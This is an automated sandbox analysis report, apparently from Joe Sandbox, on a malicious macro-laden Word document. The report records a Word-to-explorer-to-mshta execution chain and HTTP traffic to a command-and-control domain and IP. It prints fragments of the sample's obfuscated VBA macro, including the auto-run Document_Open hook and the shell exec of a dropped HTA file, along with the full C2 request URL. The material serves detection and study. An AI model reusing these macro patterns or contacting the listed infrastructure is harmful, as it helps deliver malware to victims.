Source: enjoin,12.27.2021.doc |
ReversingLabs: Detection: 44% |
Source: enjoin,12.27.2021.doc |
Joe Sandbox ML: detected |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe |
Source: global traffic |
TCP traffic: 192.168.2.22:49165 -> 45.67.229.54:80 |
Source: global traffic |
DNS query: name: patelboostg.com |
Source: global traffic |
HTTP traffic detected: GET /frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qAhIQjrAaLKJeTLQnbCarASpMADNe9u19Kylnkoreo7/SjqMh4eEx0Hx9b4h5e2fMcQgeIbFT/kKeSzfUaenwSFB/ISkVIHedx0p/49280/SruwcI68Yb5pVaVqfvyOHztDsbEuhGxtlV6bpgPIFvGFQ277/7FkN9pAcaWDfFlGNBeuaqGed8iDibaWexT/GyAAzLRbFAU1XErrU1F/vaci3?page=V8BBaQuem65&page=XYvyd0Dcrg6fJYLGHRVWp7s1tv&page=dvZwXcjcYCjBX8tPaALshiDAx85PEq&sid=10tOgWzOZj9xyAidNJAz3d9Ob0 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: patelboostg.com
Connection: Keep-Alive |
Source: mshta.exe, 00000004.00000002.422851732.00000000061D0000.00000004.00000001.sdmp |
String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin) |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail) |
Source: mshta.exe, 00000004.00000002.422851732.00000000061D0000.00000004.00000001.sdmp |
String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin) |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
String found in binary or memory: http://investor.msn.com/ |
Source: mshta.exe, 00000004.00000002.422251797.00000000038B7000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XML.asp |
Source: mshta.exe, 00000004.00000002.422251797.00000000038B7000.00000002.00020000.sdmp |
String found in binary or memory: http://localizability/practices/XMLConfiguration.asp |
Source: mshta.exe, 00000004.00000003.421274202.000000000235B000.00000004.00000001.sdmp, mshta.exe, 00000004.00000003.420884675.0000000000382000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.422873506.00000000061F8000.00000004.00000001.sdmp, mshta.exe, 00000004.00000002.421768201.0000000000388000.00000004.00000001.sdmp |
String found in binary or memory: http://patelboostg.com/frhe/L8dclCye7SQ5WTFva78FDxOjGBOF9iJro4DRgV/5inYIaSBt0KLfMB9kXwZBv6ZpTsny6/qA |
Source: explorer.exe, 00000002.00000002.406995394.0000000001C50000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.407293237.0000000001D40000.00000002.00020000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. |
Source: mshta.exe, 00000004.00000002.422251797.00000000038B7000.00000002.00020000.sdmp |
String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check |
Source: mshta.exe, 00000004.00000002.422251797.00000000038B7000.00000002.00020000.sdmp |
String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true |
Source: explorer.exe, 00000002.00000002.406995394.0000000001C50000.00000002.00020000.sdmp, explorer.exe, 00000003.00000002.407293237.0000000001D40000.00000002.00020000.sdmp |
String found in binary or memory: http://www.%s.comPA |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
String found in binary or memory: http://www.hotmail.com/oe |
Source: mshta.exe, 00000004.00000002.422251797.00000000038B7000.00000002.00020000.sdmp |
String found in binary or memory: http://www.icra.org/vocabulary/. |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
String found in binary or memory: http://www.msnbc.com/news/ticker.txt |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
String found in binary or memory: http://www.windows.com/pctv. |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B70C9704-7AD7-458C-BF06-A25E66915659}.tmp |
Source: unknown |
DNS traffic detected: queries for: patelboostg.com |
Source: enjoin,12.27.2021.doc |
OLE, VBA macro line: CreateObject("wsc" + cont1("company") + "ell").exec cont1("category") + " " + mouseVideo |
|
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisDocument, Function srn1, API IWshShell3.exec("explorer i7Gigabyte.hta") |
Name: srn1 |
Source: enjoin,12.27.2021.doc |
OLE, VBA macro line: Sub Document_Open() |
|
Source: VBA code instrumentation |
OLE, VBA macro: Module ThisDocument, Function Document_Open |
Name: Document_Open |
Source: enjoin,12.27.2021.doc |
OLE indicator, VBA macros: true |
Source: enjoin,12.27.2021.doc |
OLE, VBA macro line: cont1 = activedocument.builtindocumentproperties(i7computermonitor).value |
Source: C:\Windows\SysWOW64\mshta.exe |
Memory allocated: 76F90000 page execute and read and write |
Source: C:\Windows\SysWOW64\mshta.exe |
Memory allocated: 76E90000 page execute and read and write |
Source: unknown |
Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding |
|
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process created: C:\Windows\explorer.exe explorer i7Gigabyte.hta |
|
Source: unknown |
Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding |
|
Source: C:\Windows\explorer.exe |
Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\Documents\i7Gigabyte.hta" |
|
Source: enjoin,12.27.2021.doc |
OLE indicator, Word Document stream: true |
Source: mshta.exe, 00000004.00000002.422058921.00000000036D0000.00000002.00020000.sdmp |
Binary or memory string: .VBPud<_ |
Source: classification engine |
Classification label: mal64.expl.winDOC@6/13@1/1 |
Source: enjoin,12.27.2021.doc |
OLE document summary: title field not present or empty |
Source: enjoin,12.27.2021.doc |
OLE document summary: author field not present or empty |
Source: enjoin,12.27.2021.doc |
OLE document summary: edited time not present or 0 |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: enjoin,12.27.2021.doc |
Initial sample: OLE summary comments = ta |
Source: enjoin,12.27.2021.doc |
Initial sample: OLE document summary bytes = 26624 |
Source: enjoin,12.27.2021.doc |
Initial sample: OLE document summary category = explorer |
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\explorer.exe |
Process information set: NOOPENFILEERRORBOX |
Source: C:\Windows\SysWOW64\mshta.exe |
Process information set: NOOPENFILEERRORBOX |
Source: enjoin,12.27.2021.doc |
Stream path 'Data' entropy: 7.93699752134 (max. 8.0) |
Source: C:\Windows\explorer.exe TID: 2604 |
Thread sleep time: -60000s >= -30000s |
Source: C:\Windows\explorer.exe TID: 2780 |
Thread sleep time: -60000s >= -30000s |
Source: C:\Windows\SysWOW64\mshta.exe TID: 2852 |
Thread sleep time: -360000s >= -30000s |
Source: explorer.exe, 00000003.00000003.406664459.000000000041E000.00000004.00000001.sdmp |
Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}] |
Source: C:\Windows\SysWOW64\mshta.exe |
Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation |
Source: C:\Windows\explorer.exe |
Directory queried: C:\Users\user\Documents |
Source: C:\Windows\SysWOW64\mshta.exe |
Directory queried: C:\Users\user\Documents |